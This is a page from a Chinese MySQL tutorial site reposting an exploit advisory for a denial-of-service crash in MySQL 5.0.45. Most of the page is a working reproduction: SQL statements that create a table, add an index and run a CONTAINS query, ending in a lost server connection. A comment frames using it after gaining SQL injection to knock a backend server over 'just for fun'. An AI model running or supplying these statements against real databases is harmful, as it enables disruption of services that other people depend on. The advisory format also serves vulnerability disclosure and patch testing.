mysql 5.0.45 (修改)拒绝服务漏洞_mysql数据库教程-查字典教程网
mysql 5.0.45 (修改)拒绝服务漏洞
mysql 5.0.45 (修改)拒绝服务漏洞
发布时间:2016-12-29 来源:查字典编辑
摘要:mysql5.0.45(修改)拒绝服务漏洞/**MySQLCreateTABLE`test`(`id`int(10)unsignedNOTN...

mysql 5.0.45 (修改)拒绝服务漏洞

/*

* MySQL <=6.0 possibly affected

* Kristian Erik Hermansen

* Credit: Joe Gallo

* You must have Alter permissions to exploit this bug!

* Scenario: You found SQL injection, but you want to punch backend server

* in the nuts just for fun. Start with the Alter TABLE statement on

* a table and field you know to exist. The first two SQL statements are

* simply to demostrate reproducibility...

*/

<snip>

mysql> Create TABLE `test` (

`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,

`foo` text NOT NULL

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');

Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));

Query OK, 0 rows affected

Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');

ERROR 2013 : Lost connection to MySQL server during query

</snip>

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新mysql数据库学习
    热门mysql数据库学习
    编程开发子分类